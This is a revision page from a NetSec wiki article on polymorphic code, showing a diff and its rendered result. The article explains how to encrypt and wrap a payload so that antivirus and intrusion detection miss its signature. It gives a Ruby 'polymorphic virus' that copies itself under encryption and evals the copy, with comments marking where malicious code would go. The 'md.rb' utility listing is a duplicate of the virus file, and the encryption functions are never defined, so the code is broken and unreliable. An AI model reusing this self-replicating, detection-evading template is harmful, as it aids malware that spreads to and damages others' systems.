Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Polymorphic"

From NetSec
Jump to: navigation, search
Line 1: Line 1:
 
{{expand}}
 
{{expand}}
 
Adj. referring to self-modifying code.
 
Adj. referring to self-modifying code.
 +
 +
 +
= Reasons to write polymorphic code =
 +
 +
The main reason to write polymorphic code is to avoid being hashwise identified, or to have code signature detected, i.e. an IDS or anti-virus software will not identify the payload as it is nicely wrapped-up in an encrypted form. Another reason is to propagate it to multiple copies without having the same signature.
 +
 +
 +
= Techniques of polymorphic code writing =
 +
 +
* Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code
 +
Note: you can write a single function or pair of functions and have them vary with a series of keys (outputted by a deterministic key generator ideally), as long as your encryption remains revertable.
 +
* Write your payload code (that you want dissimulated). At the end of this code put some bootstrap that will decrypt and run the code (in PHP/ruby/perl/whatnot, eval it, in C, smash the stack with it, in C#, use reflection). At the beginning of your payload code, call for your encryption/duplication code.
 +
 +
= Example in Ruby =
 +
 +
== pv.rb (polymorphic virus) ==
 +
<pre>
 +
#!/usr/bin/env ruby1.9.1
 +
if (!defined?(FILE))
 +
FILE=File.basename(__FILE__)
 +
end
 +
load "md.rb";
 +
#require "FileUtils"
 +
def selfCopy(key)
 +
code = ""
 +
newkey = deterministicKeygen(key);
 +
File.open(FILE, "r").each_line do |l|
 +
code += l
 +
end
 +
code = mencrypt(code, key)
 +
# define new file name
 +
fn = rand(128).to_s + 'copy.rb';
 +
File.open(fn, 'w+') do |f|
 +
f.write('load "md.rb";'+"\n");
 +
# this is needed because __FILE__ isn't to be found in eval
 +
f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
 +
f.write('code="'+code+'";'+"\n")
 +
f.write('eval(mdecrypt(code, ' + key.to_s+'))');
 +
end
 +
return newkey
 +
end
 +
 +
# initial key is 42, D.A. told me
 +
key = 42
 +
# malicious section
 +
# first, replicate
 +
key = selfCopy(key)
 +
# then do evil!
 +
puts "Hello, it's savitri"
 +
 +
</pre>
 +
 +
== md.rb (utility functions) ==
 +
<pre>
 +
#!/usr/bin/env ruby1.9.1
 +
if (!defined?(FILE))
 +
FILE=File.basename(__FILE__)
 +
end
 +
load "md.rb";
 +
#require "FileUtils"
 +
def selfCopy(key)
 +
code = ""
 +
newkey = deterministicKeygen(key);
 +
File.open(FILE, "r").each_line do |l|
 +
code += l
 +
end
 +
code = mencrypt(code, key)
 +
# define new file name
 +
fn = rand(128).to_s + 'copy.rb';
 +
File.open(fn, 'w+') do |f|
 +
f.write('load "md.rb";'+"\n");
 +
# this is needed because __FILE__ isn't to be found in eval
 +
f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
 +
f.write('code="'+code+'";'+"\n")
 +
f.write('eval(mdecrypt(code, ' + key.to_s+'))');
 +
end
 +
return newkey
 +
end
 +
 +
# initial key is 42, D.A. told me
 +
key = 42
 +
# malicious section
 +
# first, replicate
 +
key = selfCopy(key)
 +
# then do evil!
 +
puts "Hello, it's savitri"
 +
 +
</pre>

Revision as of 21:25, 9 November 2011

This article contains too little information, it should be expanded or updated.
Things you can do to help:
  • add more content.
  • update current content.

Adj. referring to self-modifying code.


Reasons to write polymorphic code

The main reason to write polymorphic code is to avoid being hashwise identified, or to have code signature detected, i.e. an IDS or anti-virus software will not identify the payload as it is nicely wrapped-up in an encrypted form. Another reason is to propagate it to multiple copies without having the same signature.


Techniques of polymorphic code writing

  • Define a stackable set of encrypting/decrypting functions, preferrably working with an encryption key. Let's call these sets d and e (decryption / encryption), and let there be two integers n, m, n > m so that d[n](d[n-1](...(d[m](e[n](e[n-1](...e[m](code))...) == code

Note: you can write a single function or pair of functions and have them vary with a series of keys (outputted by a deterministic key generator ideally), as long as your encryption remains revertable.

  • Write your payload code (that you want dissimulated). At the end of this code put some bootstrap that will decrypt and run the code (in PHP/ruby/perl/whatnot, eval it, in C, smash the stack with it, in C#, use reflection). At the beginning of your payload code, call for your encryption/duplication code.

Example in Ruby

pv.rb (polymorphic virus)

#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
FILE=File.basename(__FILE__)
end
load "md.rb";
#require "FileUtils"
def selfCopy(key)
	code = ""
	newkey = deterministicKeygen(key);
	File.open(FILE, "r").each_line do |l|
		code += l
	end
	code = mencrypt(code, key)
	# define new file name
	fn = rand(128).to_s + 'copy.rb';
	File.open(fn, 'w+') do |f|
		f.write('load "md.rb";'+"\n");
		# this is needed because __FILE__ isn't to be found in eval
		f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
		f.write('code="'+code+'";'+"\n")
		f.write('eval(mdecrypt(code, ' + key.to_s+'))');
	end
	return newkey
end

# initial key is 42, D.A. told me
key = 42 
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"

md.rb (utility functions)

#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
FILE=File.basename(__FILE__)
end
load "md.rb";
#require "FileUtils"
def selfCopy(key)
	code = ""
	newkey = deterministicKeygen(key);
	File.open(FILE, "r").each_line do |l|
		code += l
	end
	code = mencrypt(code, key)
	# define new file name
	fn = rand(128).to_s + 'copy.rb';
	File.open(fn, 'w+') do |f|
		f.write('load "md.rb";'+"\n");
		# this is needed because __FILE__ isn't to be found in eval
		f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n");
		f.write('code="'+code+'";'+"\n")
		f.write('eval(mdecrypt(code, ' + key.to_s+'))');
	end
	return newkey
end

# initial key is 42, D.A. told me
key = 42 
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"